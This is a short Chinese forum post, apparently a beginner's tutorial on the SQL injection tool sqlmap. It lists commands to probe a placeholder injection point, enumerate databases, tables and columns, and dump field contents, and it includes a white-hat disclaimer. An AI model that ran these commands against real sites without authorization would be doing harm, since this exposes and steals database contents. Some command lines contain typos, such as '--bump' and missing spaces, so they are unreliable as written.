设为首页
收藏本站
开启辅助访问
用户名
Email
自动登录
找回密码
密码
登录
立即注册
搜索
搜索
本版
帖子
用户
快捷导航
首页
List
论坛
BBS
关于组织
爱生活
Moke|墨客
»
论坛
›
会员互动区
›
公开数据
›
菜鸟如何使用SQLMAP
返回列表
查看:
7629
|
回复:
0
菜鸟如何使用SQLMAP
[复制链接]
pasckr
pasckr
当前离线
积分
3681
窥视卡
雷达卡
3636
主题
0
回帖
3681
积分
超级版主
积分
3681
发消息
发表于 2016-5-9 14:17:51
|
显示全部楼层
|
阅读模式
SQLMAP是一个自动注入化工具 运行在Python 2.7 环境有具有很强跨平台性、无图形界面
1.
使用快捷方式启动
2.
现做如下假设
1. 已经安装Python2.7 并已经添加了环境变量
2. 已经下载了SQLMAP
3. 会使用cmd命令行
打开要在sqlmap的目录里
注入点 、绝对不要做坏事 我们是白帽黑阔 这已经提交补天了
1
**************************************
1
sqlmap.py-u"注入点"//会判断数据库类型,服务操作系统、脚本类型 前后有双引号
1
03服务器/asp.net/ms sql2008
1
sqlmap.py-u"注入点"--dbs//列数据库 按上键
1
sqlmap.py-u"注入点"-D数据库名--tables//列出表名
1
sqlmap.py-u"注入点"-D数据库名-T表名--columns//猜字段
1
sqlmap.py-u"注入点"-D数据库名-T表名-C"字段名2,字段名2”--bump//获得字符、段内容
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
返回列表
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
回帖后跳转到最后一页
快速回复
返回顶部
返回列表